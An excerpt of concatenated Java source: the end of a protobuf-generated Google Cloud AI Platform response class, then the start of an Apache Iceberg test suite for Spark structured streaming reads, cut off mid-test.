{ return java.util.Collections.unmodifiableList(optimalTrials_); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial.Builder addOptimalTrialsBuilder() { return getOptimalTrialsFieldBuilder() .addBuilder(com.google.cloud.aiplatform.v1.Trial.getDefaultInstance()); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial.Builder addOptimalTrialsBuilder(int index) { return getOptimalTrialsFieldBuilder() .addBuilder(index, com.google.cloud.aiplatform.v1.Trial.getDefaultInstance()); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Trial.Builder> getOptimalTrialsBuilderList() { return getOptimalTrialsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Trial, com.google.cloud.aiplatform.v1.Trial.Builder, com.google.cloud.aiplatform.v1.TrialOrBuilder> getOptimalTrialsFieldBuilder() { if (optimalTrialsBuilder_ == null) { optimalTrialsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Trial, com.google.cloud.aiplatform.v1.Trial.Builder, com.google.cloud.aiplatform.v1.TrialOrBuilder>( optimalTrials_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); optimalTrials_ = null; } return optimalTrialsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) private static final com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse(); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListOptimalTrialsResponse> PARSER = new com.google.protobuf.AbstractParser<ListOptimalTrialsResponse>() { @java.lang.Override public ListOptimalTrialsResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListOptimalTrialsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListOptimalTrialsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/iceberg
35,738
spark/v3.4/spark/src/test/java/org/apache/iceberg/spark/source/TestStructuredStreamingRead3.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iceberg.spark.source; import static org.apache.iceberg.expressions.Expressions.ref; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatThrownBy; import java.io.File; import java.io.IOException; import java.util.Collections; import java.util.List; import java.util.Map; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicInteger; import java.util.stream.IntStream; import org.apache.iceberg.BaseTable; import org.apache.iceberg.DataFile; import org.apache.iceberg.DataFiles; import org.apache.iceberg.DataOperations; import org.apache.iceberg.DeleteFile; import org.apache.iceberg.FileFormat; import org.apache.iceberg.Files; import org.apache.iceberg.ParameterizedTestExtension; import org.apache.iceberg.RewriteFiles; import org.apache.iceberg.Schema; import org.apache.iceberg.Snapshot; import org.apache.iceberg.Table; import org.apache.iceberg.TableMetadata; import org.apache.iceberg.TableOperations; import org.apache.iceberg.TestHelpers; import org.apache.iceberg.data.FileHelpers; import org.apache.iceberg.data.GenericRecord; import org.apache.iceberg.data.Record; import org.apache.iceberg.expressions.Expressions; import org.apache.iceberg.relocated.com.google.common.collect.ImmutableMap; import org.apache.iceberg.relocated.com.google.common.collect.Iterables; import org.apache.iceberg.relocated.com.google.common.collect.Lists; import org.apache.iceberg.spark.CatalogTestBase; import org.apache.iceberg.spark.SparkReadOptions; import org.apache.spark.api.java.function.VoidFunction2; import org.apache.spark.sql.Dataset; import org.apache.spark.sql.Encoders; import org.apache.spark.sql.Row; import org.apache.spark.sql.internal.SQLConf; import org.apache.spark.sql.streaming.DataStreamWriter; import org.apache.spark.sql.streaming.OutputMode; import org.apache.spark.sql.streaming.StreamingQuery; import org.apache.spark.sql.streaming.Trigger; import org.junit.jupiter.api.AfterEach; import org.junit.jupiter.api.BeforeAll; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.TestTemplate; import org.junit.jupiter.api.extension.ExtendWith; @ExtendWith(ParameterizedTestExtension.class) public final class TestStructuredStreamingRead3 extends CatalogTestBase { private Table table; private final AtomicInteger microBatches = new AtomicInteger(); /** * test data to be used by multiple writes each write creates a snapshot and writes a list of * records */ private static final List<List<SimpleRecord>> TEST_DATA_MULTIPLE_SNAPSHOTS = Lists.newArrayList( Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")), Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five")), Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven"))); /** * test data - to be used for multiple write batches each batch inturn will have multiple * snapshots */ private static final List<List<List<SimpleRecord>>> TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS = Lists.newArrayList( Lists.newArrayList( Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")), Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five"))), Lists.newArrayList( Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")), Lists.newArrayList(new SimpleRecord(8, "eight"), new SimpleRecord(9, "nine"))), Lists.newArrayList( Lists.newArrayList( new SimpleRecord(10, "ten"), new SimpleRecord(11, "eleven"), new SimpleRecord(12, "twelve")), Lists.newArrayList( new SimpleRecord(13, "thirteen"), new SimpleRecord(14, "fourteen")), Lists.newArrayList( new SimpleRecord(15, "fifteen"), new SimpleRecord(16, "sixteen")))); @BeforeAll public static void setupSpark() { // disable AQE as tests assume that writes generate a particular number of files spark.conf().set(SQLConf.ADAPTIVE_EXECUTION_ENABLED().key(), "false"); } @BeforeEach public void setupTable() { sql( "CREATE TABLE %s " + "(id INT, data STRING) " + "USING iceberg " + "PARTITIONED BY (bucket(3, id)) " + "TBLPROPERTIES ('commit.manifest.min-count-to-merge'='3', 'commit.manifest-merge.enabled'='true')", tableName); this.table = validationCatalog.loadTable(tableIdent); microBatches.set(0); } @AfterEach public void stopStreams() throws TimeoutException { for (StreamingQuery query : spark.streams().active()) { query.stop(); } } @AfterEach public void removeTables() { sql("DROP TABLE IF EXISTS %s", tableName); } @TestTemplate public void testReadStreamOnIcebergTableWithMultipleSnapshots() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); StreamingQuery query = startStream(); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadStreamWithMaxFiles1() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithMaxFiles2() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithMaxRows1() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); // soft limit of 1 is being enforced, the stream is not blocked. StreamingQuery query = startStream(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual) .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS)); } @TestTemplate public void testReadStreamWithMaxRows2() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L), Trigger.AvailableNow()); StreamingQuery query = startStream(ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2")); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual) .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS)); } @TestTemplate public void testReadStreamWithMaxRows4() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithCompositeReadLimit() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4", SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1", SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); } @TestTemplate public void testAvailableNowStreamReadShouldNotHangOrReprocessData() throws Exception { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .trigger(Trigger.AvailableNow()) .option("path", output.getPath()); List<SimpleRecord> expected = Lists.newArrayList(); for (List<List<SimpleRecord>> expectedCheckpoint : TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) { // New data was added while the stream was not running appendDataAsMultipleSnapshots(expectedCheckpoint); expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint)))); try { StreamingQuery query = querySource.start(); // Query should terminate on its own after processing all available data assertThat(query.awaitTermination(60000)).isTrue(); // Check output List<SimpleRecord> actual = spark .read() .load(output.getPath()) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); // Restarting immediately should not reprocess data query = querySource.start(); assertThat(query.awaitTermination(60000)).isTrue(); assertThat(query.recentProgress().length).isEqualTo(1); assertThat(query.recentProgress()[0].sources()[0].startOffset()) .isEqualTo(query.recentProgress()[0].sources()[0].endOffset()); } finally { stopStreams(); } } } @TestTemplate public void testTriggerAvailableNowDoesNotProcessNewDataWhileRunning() throws Exception { List<List<SimpleRecord>> expectedData = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expectedData); long expectedRecordCount = expectedData.stream().mapToLong(List::size).sum(); table.refresh(); long expectedSnapshotId = table.currentSnapshot().snapshotId(); String sinkTable = "availablenow_sink"; StreamingQuery query = spark .readStream() .option(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1") .format("iceberg") .load(tableName) .writeStream() .format("memory") .queryName(sinkTable) .trigger(Trigger.AvailableNow()) .start(); assertThat(query.isActive()).isTrue(); // Add new data while the stream is running List<SimpleRecord> newDataDuringStreamSnap1 = Lists.newArrayList( new SimpleRecord(100, "hundred"), new SimpleRecord(101, "hundred-one"), new SimpleRecord(102, "hundred-two")); List<SimpleRecord> newDataDuringStreamSnap2 = Lists.newArrayList( new SimpleRecord(200, "two-hundred"), new SimpleRecord(201, "two-hundred-one")); appendData(newDataDuringStreamSnap1); appendData(newDataDuringStreamSnap2); // Query should terminate on its own after processing all available data till expectedSnapshotId assertThat(query.awaitTermination(60000)).isTrue(); List<SimpleRecord> actualResults = spark .sql("SELECT * FROM " + sinkTable) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); long endOffsetSnapshotId = StreamingOffset.fromJson(query.lastProgress().sources()[0].endOffset()).snapshotId(); // Verify the stream processed only up to the snapshot present when started assertThat(expectedSnapshotId).isEqualTo(endOffsetSnapshotId); // Verify only the initial data was processed assertThat(actualResults.size()).isEqualTo(expectedRecordCount); assertThat(actualResults).containsExactlyInAnyOrderElementsOf(Iterables.concat(expectedData)); } @TestTemplate public void testReadStreamOnIcebergThenAddData() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; StreamingQuery query = startStream(); appendDataAsMultipleSnapshots(expected); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromTimestamp() throws Exception { List<SimpleRecord> dataBeforeTimestamp = Lists.newArrayList( new SimpleRecord(-2, "minustwo"), new SimpleRecord(-1, "minusone"), new SimpleRecord(0, "zero")); appendData(dataBeforeTimestamp); table.refresh(); long streamStartTimestamp = table.currentSnapshot().timestampMillis() + 1; StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp)); List<SimpleRecord> empty = rowsAvailable(query); assertThat(empty.isEmpty()).isTrue(); List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromFutureTimetsamp() throws Exception { long futureTimestamp = System.currentTimeMillis() + 10000; StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(futureTimestamp)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual.isEmpty()).isTrue(); List<SimpleRecord> data = Lists.newArrayList( new SimpleRecord(-2, "minustwo"), new SimpleRecord(-1, "minusone"), new SimpleRecord(0, "zero")); // Perform several inserts that should not show up because the fromTimestamp has not elapsed IntStream.range(0, 3) .forEach( x -> { appendData(data); assertThat(rowsAvailable(query).isEmpty()).isTrue(); }); waitUntilAfter(futureTimestamp); // Data appended after the timestamp should appear appendData(data); actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(data); } @TestTemplate public void testReadingStreamFromTimestampFutureWithExistingSnapshots() throws Exception { List<SimpleRecord> dataBeforeTimestamp = Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")); appendData(dataBeforeTimestamp); long streamStartTimestamp = System.currentTimeMillis() + 2000; // Start the stream with a future timestamp after the current snapshot StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).isEmpty(); // Stream should contain data added after the timestamp elapses waitUntilAfter(streamStartTimestamp); List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromTimestampOfExistingSnapshot() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; // Create an existing snapshot with some data appendData(expected.get(0)); table.refresh(); long firstSnapshotTime = table.currentSnapshot().timestampMillis(); // Start stream giving the first Snapshot's time as the start point StreamingQuery stream = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(firstSnapshotTime)); // Append rest of expected data for (int i = 1; i < expected.size(); i++) { appendData(expected.get(i)); } List<SimpleRecord> actual = rowsAvailable(stream); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamWithExpiredSnapshotFromTimestamp() throws TimeoutException { List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one")); List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two")); List<SimpleRecord> thirdSnapshotRecordList = Lists.newArrayList(new SimpleRecord(3, "three")); List<SimpleRecord> expectedRecordList = Lists.newArrayList(); expectedRecordList.addAll(secondSnapshotRecordList); expectedRecordList.addAll(thirdSnapshotRecordList); appendData(firstSnapshotRecordList); table.refresh(); long firstSnapshotid = table.currentSnapshot().snapshotId(); long firstSnapshotCommitTime = table.currentSnapshot().timestampMillis(); appendData(secondSnapshotRecordList); appendData(thirdSnapshotRecordList); table.expireSnapshots().expireSnapshotId(firstSnapshotid).commit(); StreamingQuery query = startStream( SparkReadOptions.STREAM_FROM_TIMESTAMP, String.valueOf(firstSnapshotCommitTime)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(expectedRecordList); } @TestTemplate public void testResumingStreamReadFromCheckpoint() throws Exception { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .queryName("checkpoint_test") .option("path", output.getPath()); StreamingQuery startQuery = querySource.start(); startQuery.processAllAvailable(); startQuery.stop(); List<SimpleRecord> expected = Lists.newArrayList(); for (List<List<SimpleRecord>> expectedCheckpoint : TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) { // New data was added while the stream was down appendDataAsMultipleSnapshots(expectedCheckpoint); expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint)))); // Stream starts up again from checkpoint read the newly added data and shut down StreamingQuery restartedQuery = querySource.start(); restartedQuery.processAllAvailable(); restartedQuery.stop(); // Read data added by the stream List<SimpleRecord> actual = spark.read().load(output.getPath()).as(Encoders.bean(SimpleRecord.class)).collectAsList(); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } } @TestTemplate public void testFailReadingCheckpointInvalidSnapshot() throws IOException, TimeoutException { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .queryName("checkpoint_test") .option("path", output.getPath()); List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one")); List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two")); StreamingQuery startQuery = querySource.start(); appendData(firstSnapshotRecordList); table.refresh(); long firstSnapshotid = table.currentSnapshot().snapshotId(); startQuery.processAllAvailable(); startQuery.stop(); appendData(secondSnapshotRecordList); table.expireSnapshots().expireSnapshotId(firstSnapshotid).commit(); StreamingQuery restartedQuery = querySource.start(); assertThatThrownBy(restartedQuery::processAllAvailable) .hasCauseInstanceOf(IllegalStateException.class) .hasMessageContaining( String.format( "Cannot load current offset at snapshot %d, the snapshot was expired or removed", firstSnapshotid)); } @TestTemplate public void testParquetOrcAvroDataInOneTable() throws Exception { List<SimpleRecord> parquetFileRecords = Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")); List<SimpleRecord> orcFileRecords = Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five")); List<SimpleRecord> avroFileRecords = Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")); appendData(parquetFileRecords); appendData(orcFileRecords, "orc"); appendData(avroFileRecords, "avro"); StreamingQuery query = startStream(); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf( Iterables.concat(parquetFileRecords, orcFileRecords, avroFileRecords)); } @TestTemplate public void testReadStreamFromEmptyTable() throws Exception { StreamingQuery stream = startStream(); List<SimpleRecord> actual = rowsAvailable(stream); assertThat(actual).isEmpty(); } @TestTemplate public void testReadStreamWithSnapshotTypeOverwriteErrorsOut() throws Exception { // upgrade table to version 2 - to facilitate creation of Snapshot of type OVERWRITE. TableOperations ops = ((BaseTable) table).operations(); TableMetadata meta = ops.current(); ops.commit(meta, meta.upgradeToFormatVersion(2)); // fill table with some initial data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); Schema deleteRowSchema = table.schema().select("data"); Record dataDelete = GenericRecord.create(deleteRowSchema); List<Record> dataDeletes = Lists.newArrayList( dataDelete.copy("data", "one") // id = 1 ); DeleteFile eqDeletes = FileHelpers.writeDeleteFile( table, Files.localOutput(File.createTempFile("junit", null, temp.toFile())), TestHelpers.Row.of(0), dataDeletes, deleteRowSchema); DataFile dataFile = DataFiles.builder(table.spec()) .withPath(File.createTempFile("junit", null, temp.toFile()).getPath()) .withFileSizeInBytes(10) .withRecordCount(1) .withFormat(FileFormat.PARQUET) .build(); table.newRowDelta().addRows(dataFile).addDeletes(eqDeletes).commit(); // check pre-condition - that the above Delete file write - actually resulted in snapshot of // type OVERWRITE assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE); StreamingQuery query = startStream(); assertThatThrownBy(query::processAllAvailable) .cause() .isInstanceOf(IllegalStateException.class) .hasMessageStartingWith("Cannot process overwrite snapshot"); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxRows() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "4"), List.of(5L, 2L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxFilesAndRows() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4", SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotType2RewriteDataFilesIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceFollowedByAppend() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); appendDataAsMultipleSnapshots(expected); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L, 1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeReplaceIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); // this should create a snapshot with type Replace. table.rewriteManifests().clusterBy(f -> 1).commit(); // check pre-condition assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.REPLACE); StreamingQuery query = startStream(); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteErrorsOut() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); // this should create a snapshot with type delete. table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // DELETE. assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE); StreamingQuery query = startStream(); assertThatThrownBy(query::processAllAvailable) .cause() .isInstanceOf(IllegalStateException.class) .hasMessageStartingWith("Cannot process delete snapshot"); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteAndSkipDeleteOption() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); // this should create a snapshot with type delete. table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // DELETE. assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE); StreamingQuery query = startStream(SparkReadOptions.STREAMING_SKIP_DELETE_SNAPSHOTS, "true"); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots)); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteAndSkipOverwriteOption() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = 